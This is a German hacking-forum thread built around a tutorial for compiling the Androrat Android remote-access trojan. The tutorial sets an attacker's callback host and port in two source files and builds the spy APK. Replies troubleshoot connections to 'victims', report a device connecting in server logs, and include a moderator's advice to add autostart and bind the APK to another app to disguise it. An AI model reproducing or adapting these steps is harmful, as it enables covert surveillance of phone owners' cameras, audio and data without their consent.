Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[TUT] Androrat server 1.4 download und compile

- - - - -

  • Bitte melde dich an um zu Antworten
34 Antworten in diesem Thema

#1
wubulaien

wubulaien

    Noob

  • Members
  • PIPPIP
  • Likes
    10
  • 6 Beiträge
  • 4 Bedankt
Androrat ist in der Version 1.4 veröffentlicht.
Um mal etwas das Durcheinander der Begriffe zu klären:

- der Client ist hier die Datei auf dem Computer
- der Server (hier die Version 1.4) ist die von uns erstellte *.apk, die auf dem Android läuft.

Die Version 1.4 kann hier downgeloaded werden:

Please Login HERE or Register HERE to see this link!



Die müssen wir noch kompilieren.

Wir brauchen die Android SDK. download hier:

Please Login HERE or Register HERE to see this link!



Dort finden wir einen Ordner Eclipse, den wir öffnen und die eclipse.exe starten.

Wir werden nach einem Workspace gefragt. Beim ersten Start ist es Workspace1. Mit OK bestätigen.

Wir sehen den Welcome-screen.

Wir öffnen File - New - Project --- es öffnet sich ein Fenster "New Project" und wir wählen Android, jetzt bekommen wir mehrere Optionen und wählen "Android project from existing code" - Next.

Wir sehen jetzt ein Fenster "Import project", hier wählen wir das Verzeichnis, indem unsere zu compilierenden Dateien liegen.

Also Downloadverzeichnisandrorat-masterandrorat-mastersrcAndrorat. Den Ordner Androrat klicken wir nur an, sodass er blau hinterlegt ist und klicken dann auf OK. Jetzt haben wir die Datei samt Pfad bei "Import project" und bestätigen mit Finish.
(sollte es nicht so sein, also etwas inaktiv oder der Dateipfad grau hinterlegt, dann habt ihr was falsch gemacht. Dann öffnet Eclipse neu und erstellt einen neuen Workspace, also dann Workspace2.)

Jetzt wird das Project in die Workbench geladen, solltet ihr noch den Willkommenbildschirm mit Android IDE sehen, so schliesst ihr ihn mit Klick auf das weisse Kreuz oben rechts.

Nun seht ihr auf der Linken Seite im Package Explorer das Paket Androrat. Wir klicken auf das Kreuz und wir sehen mehrere Ordner und Dateien. Wir expandieren src und expandieren dann my.app.client

Hier machen wir einen Doppelklick auf BootReceiver.java. Wir sehen den Sourcecode jetzt im Editor geladen und können ihn bearbeiten. wir suchen die Zeile:

serviceIntent.putExtra("IP", "meinName.no-ip.biz"); beachtet bitte, die IP/DNS gehört in Anführungszeichen

und

serviceIntent.putExtra("Port", 1604); beachtet bitte, der Port gehört NICHT in Anführungszeichen

jetzt oben die BootReceiver.java mit Klick auf das Kreuz schliessen und mit Ja bestätigen, dass die Änderungen übernommen werden sollen.

Jetzt öffnen wir noch die LauncherActivity.java mit Doppelklick. Jetzt haben wir wieder den Sourcecode im Editor.

Hier editieren wir

String myIp = "meinName.no-ip.biz"; Ip oder DNS in Anführungsstriche!!

und

int myPort = 1604; Keine Anführungsstriche

wieder schliessen und speichern bestätigen.

Jetzt gehen wir in der Menüleiste auf Project, wir entfernen den Haken bei "Buid automatically". Jetzt noch einmal auf Project und dann auf "Build all". FERTIG

Unsere kompilierte APK finden wir in UNSERDOWNLOADPFADandrorat-masterandrorat-mastersrcAndroratbin

Bitte bei Fragen hier melden. Es ist mein erstes TUT, bitte seid nachsichtig mit mir.
  • PeterGriffin, 133TFoX, White-Warti und 6 anderen gefällt das

Thanked by 4 Members:
Nissan300zx , streika , Andre2209 , domsg89

#2
Avni

Avni

    1337

  • Elite Member
  • Likes
    86
  • 401 Beiträge
  • 142 Bedankt
Danke scheint zu funktionieren. Hab es schon mit sovielen Tuts versucht aber es war bis jetzt keins so wie deines. Bei den anderen musste man viel mehr machen.

Wird Androrat eigentlich noch weiterentwickelt?

Bearbeitet von Avni, 21 January 2014 - 15:02 Uhr.


#3
wubulaien

wubulaien

    Noob

  • Members
  • PIPPIP
  • Likes
    10
  • 6 Beiträge
  • 4 Bedankt
Vielen Dank.
Ja es wird weiter entwickelt.
Dieses ist die aktuellste Version, die am 10.01.2014 veröffentlicht wurde.
Die Option "Bild von Kamera" aufnehmen ist sehr buggy. Auch das Aufnehmen der Audios. Wenn die Aufnahme oder der Stream beendet wurde, kann es nicht wieder gestartet werden. Der Rest läuft eigentlich recht ordentlich.

#4
Avni

Avni

    1337

  • Elite Member
  • Likes
    86
  • 401 Beiträge
  • 142 Bedankt
Hab nun mal Android in einer VM laufen und bekomme beim ausführen des "servers" leider diesen Fehler.

Eingefügtes Bild

#5
wubulaien

wubulaien

    Noob

  • Members
  • PIPPIP
  • Likes
    10
  • 6 Beiträge
  • 4 Bedankt
Hast du deine SDK files upgedatet? Welche Virtual device hast du geladen?

#6
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    67
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux

Hab nun mal Android in einer VM laufen und bekomme beim ausführen des "servers" leider diesen Fehler.

Eingefügtes Bild


Normal scheint mir das wie ein Sign error. Hast du dein app signed?

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 


#7
Avni

Avni

    1337

  • Elite Member
  • Likes
    86
  • 401 Beiträge
  • 142 Bedankt

Hast du deine SDK files upgedatet? Welche Virtual device hast du geladen?


Wüsste ich nichts davon. Und hab mir ein Android mit dem Namen nw_15709_androidxiso gezogen. Woher und was weis ich leider nimmer.

Normal scheint mir das wie ein Sign error. Hast du dein app signed?


Nein wusste nicht das man sowas machen muss.

#8
Guest_nonamw63_*

Guest_nonamw63_*
  • Guests
  • Likes
    0
  • Bedankt
bei mir klappt fast alles außer das wen das tojaner unterbrochen wird dann meldet es sich nicht mehr

#9
Avni

Avni

    1337

  • Elite Member
  • Likes
    86
  • 401 Beiträge
  • 142 Bedankt
Also entweder ich bin im Moment total verwirrt oder ich finde den Client nimmmer. Weis allerdings auch grad nicht ob er in deinem Download dabei war oder ich ihn mir woanders runtergeladen hab. Wurde am Client auch etwas verändern oder könnte ich jeden nehmen den ich finde?

#10
dusa

dusa

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 0 Bedankt
Bei mir connectet leider auch keiner mehr wieder ...

#11
Avni

Avni

    1337

  • Elite Member
  • Likes
    86
  • 401 Beiträge
  • 142 Bedankt
Musstest du die apk Datei erst signieren bevor du sie auf Android installieren konntest? Hab mit dem signieren irgendwie meine Probleme....

Hab mir jetzt Auto-Sign runtergeladen und es gibt auch keine Fehlermeldung aus. Allerdings wenn ich dann wieder versuch Androrat auf Android zu installieren kommt der selbe Fehler wie oben. Wenn ich es dann mit dem App Manager öffne steht bei den Details nichts da obwohl dort etwas stehen sollte oder hat das nichts mit dem signieren der apk Datei zutun?

#12
PeterGriffin

PeterGriffin

    Script Kiddie

  • Premium Member
  • Likes
    4
  • 33 Beiträge
  • 26 Bedankt
  • Spender
Vielen Dank fürs tut werde es testen und reineditieren :D

#13
dusa

dusa

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 0 Bedankt
ist diese version den stabil? connecten die opfer wieder wenn das handy neugestartet wird?

#14
Silverfazer666

Silverfazer666

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 1 Bedankt
Moin,

ich hab das so gemacht wie oben beschrieben.
Lade ich die apk aufs Handy alles i.O. (Xperia Z1)
Aber im Client wird das Handy ums verrecken nicht gefunden.
Port im Router, in der FW in den Network Maps frei gegeben. (TCP und UDP)
Keine Chance.

Was mache ich falsch?

Thanked by 1 Member:
Nissan300zx77

#15
Juri

Juri

    Moderator

  • Moderator
  • Likes
    271
  • 341 Beiträge
  • 300 Bedankt
  • verifiziert
  • iPhone
  • Windows, Mac OS
Fügt halt einen autostart oder sowas zu ^^.png' class='bbc_emoticon' alt='^^' />
Gibt genug snippets..

Außerdem könnt ihr die apk an eine andere akp binden.
Gruß,
»Jurist

Meine Kontonr:

4-517-879


#16
Silverfazer666

Silverfazer666

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 1 Bedankt
Ich hab es schon an eine App mit Autostart gebunden
Aber trotz alledem klappt das nicht das ich was sehe

Und Port ist offen.
Über canyouseeme getestet

Bearbeitet von Silverfazer666, 15 March 2014 - 11:23 Uhr.


#17
Silverfazer666

Silverfazer666

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 1 Bedankt
Einen kleinen Schritt bin ich weiter:
Sun Mar 16 12:36:16 CET 2014 SERVER online, awaiting for a client...
Sun Mar 16 12:36:18 CET 2014 Connection established,temporary IMEI was assigned: 0client
Sun Mar 16 12:36:18 CET 2014 SERVER online, awaiting for a client...

Verbindung habe ich, bricht aber sofort wieder ab

Edit: anderer Port und zumindest der manuelle Start geht :-D
Edit2: "... reagiert nicht. Möchten Sie es schließen oder warten" Fu...

Bearbeitet von Silverfazer666, 16 March 2014 - 19:55 Uhr.


#18
Zero0150

Zero0150

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 13 Beiträge
  • 1 Bedankt
  • 197-790
Bei mir generiert er die APK nicht im Ordner bleibt die alte aus der ZIP. Fehlermeldung gibts auch nicht. Nur einen Haufen Warnungen.
Einer einen Plan warum?

#19
Yarislav

Yarislav

    Noob

  • Members
  • PIPPIP
  • Likes
    1
  • 9 Beiträge
  • 0 Bedankt
Super Tut, hat alles einwandfrei beim ersten Durchgang funktioniert. Hab die App testweise installiert, funktioniert ebenfalls.
Aber wenn ich die Server.jar Datei öffne, dann erscheint nur ein DOS Fenster, das sich sofort schließt. Wie bekomme ich die Benutzeroberfläche wie auf den Screens?

Hab gerade gesehen, dass im Fenster eine Fehlermeldung angezeigt wird: Hauptklasse kann nicht gefunden oder geladen werden. Ich hab von dem entpackten Zipfile außer wie im Tut beschrieben nichts verändert. Woran liegts?

EDIT: Hat sich erledigt; hab auf ner anderen Seite nochmal einen Download gefunden und jetzt funktioniert alles, zumindest bis zu einem Punkt.

Es steht nur da "awaiting for client". Hab es aber auf dem Handy schon installiert, WLAN ist auch auf dem Handy aktiviert, warum wird es nicht erkannt?

Bearbeitet von Yarislav, 19 May 2014 - 16:55 Uhr.


#20
Apfelschorle

Apfelschorle

    Ehem. Hardcore89

  • Members
  • PIPPIPPIPPIP
  • Likes
    0
  • 37 Beiträge
  • 5 Bedankt
Gibt es evtl auch ein Video tut?

Bearbeitet von Hardcore89, 05 June 2014 - 20:24 Uhr.




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 419 user(s)


    .:dodo:., ###, #1-, 0x00005, 133TFoX, 187zorn, 3r4g0n, 3XPL01T, 8TY-83, a8107096, acab, Account147, Ace2Fast, acidvirus23, ADYYY90, alfi79, alfjunior, aliceim, alkiman, and6578, Andre2209, anonymous..., antony989, antrokisov, ApaexProxy, Apfelschorle, Arko2004, asestar, asokone, Aucass, Avni, Bad Grandpa, BBM, beatdis, bebekid32, Benny789, BigLoser, black_head, Black2111, Blackbot, blackleaf, blackswan, BlackWindow, BlackZetsu, Bladeage, blizzard1904, bloodgear, Blower, blue_eyed_devil, BobbyRango, bolle, bonzay, Born2Hack, Botmopp, botnet333, Brainson2010, Brauser, briAck, brutusania, bruuzopnik, Bseus, bugsysunday, bumg2, BumsValera, bunkernf, Bypass, byte, calii, Caruso, Cervantes, chaos666, ChEeTaH182, Chiefkiller, Chill13, chris, Chrischan, chrissyy.feld, cla, codec4, Coder, conjurer, corkscrew, cptpshark, Cranko, Cranky, Crap, crejpito, Creo, Crowx88, crytical, Cube, cyb3rfly, Cyber Tjak, CyberFlash, D3n1s230290, D3V1L, daenman, dahate, dai, daidalos, dakilla1986, DaneSahne, danO, Dany1982, darkman, Das, dasRanger, daten, datr1xa, datri, Daywalker1337, dealerscup, Dean36, der444, DerAkim, Deutsche Vater, dev-0, DirtyGirl, Djmixerno1, domsg89, dop3, dos, Dr. p0rk, Dr. Watson, Dude1308, dunkla, dusa, dvalar, DynastieHD, Eagle71, Ebbes, El mejor, eleKz, elmicky, Emalik Xantier, Emilly1005, Epics, ereboss12, ethicalankit, excore, faceslapper, FakeKeyUser, fakkerlaka, Firecrash, fkr, fleckchen, Flex.Net, flexer1312, fluffybunny, Framerater, freedom357, FridayThe13, Frontlinez, furchterbar, G0rki, Gab00n, Gangster185, geco, geco1, Georgiana, gera121161, ghans, Giganet, Goooofy, gr3yyy, gravel, gutzuu, H0M3R5, H3lium, hacked, haha1991, hakkepeter, hansdampf, HapeHunter, hardstylestar, hastan33, haxjax, henry, hlaus777, Hollist, Holomaster, holything, holz96, hoppla, Hunqz, Hurenpeter, Husti_nett, ice, IceCracKer, ichwersonst666, igorborisvas, impericon, Irhabi, Iron, iShiZo, itzphilfx, jabba, Janitorial, Janjij, janni2339, JayTe, jayVee, JigJag, Jimbo89, JohnDS, julia, Junkie, Juri, justrix, Kaban, kallmas, Kamanji, kennydark, kevin470, keyb0ardz, KiiNGDeZz, killerkai007, killerkarpfen, King of America, kingkev0, kinzer, kiwitone, kl1q54, klammerlos, klumsy1503, Korty95, kotzbroedchen, kpakpando, kroco, Kutusow, kuzey92, lamaamala, leon00719, Lerrrtaste, linkhdub, lion., loginman1, lololilala, lolorollo, Lorsay, Louis, Lucifer8x, Ludarix_187, LulzSS, Lyrix, m0nk3y, m0rph75, m23, M4cbook, MajinCobra, mantwohouse, mast3rJ, Mates, matthewkellis, Mete, mettbrot, micoyoshic, midn84ever, MindEyes, MoD, monster1, moonman, most_uniQue, mr3ee, mrcomgame, MrSecret, mrv, MrVinc, MS1337, Mufflon12, mulu, MyHappyNoob, Nar0ko, Naws, nibble nibble, nischke, Nissan300zx, Nissan300zx77, NoName1618, nooblike, notfound, odun96, olaalo, Olafum, Omnipräsent, Osed28, otz, pale015, Panther96, PapaBoy84, ParanoID9987, paranoy, PartyPoker5252, passbase, PaulaAbdul, paulaner, pdr0, pechpilz, Peter0Gru, PetervonFrosta, Petrisun, philo_sofa, Pille, Plac3bo, Platin, pmw188, pr0be, priinx, ProHex, promoder, prto, pszalewicz, quinhomvs, R0nny01, R3s1stanc3, ragemoarpl0x, rastalani, RAT_Android, ravija007, RayDonovan, redcore, redkit09, redskorpien, RedXell, reflowstudent, reinhan, reno4680, Revofire, richi45i, Riocyber, RipperRoo, Robbenklopper, roid, rootkit, Rosaa, RoxX, Royal-mit-Käse, S33K3R, Sayco, Schnee, schubschieber, sdavovitch84, sekte09, ShizzO, shuffle, shyamv, Siggisuper, siimsucker, Silasge, Silent0wn3r, silentburn, Silverfazer666, sims23, SirPio, Skylinerz, slivanX, smc2014, smertx, Snipp3r, SonnyBlack, SPYKEshadow, Stanley, Stoffel13, streetdevil, streika, sub0, SubSeven1981, superanon, sys1910, Take1T, Th3xploiterZ, thaJack, thelazyman, Theo46, tianchrispro, Tinoindahouse, tony80, Toskom4n, truec4k3, tschilben, twicki72, txtt, tybor, tyler23, UDXR, ulrikejunker, umarex, unknownscene, up-zero, Urbantrax, virgoFF, w1p3, weedneger77, westendboy, White-Warti, whitehawk, will, world, wssp0815, Xantar, xCrasherr, Xenio, Xenos88, XeXom, xibit, xl3iitches, xmarcox3, xorr37, xxhacker, xxloggexx, xXNightiXx, xxxsmackxxx, Yarislav, Yolanda2014, Zalandos, Zecnation, zepsus, Zero0150, ZeroCool_AT
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.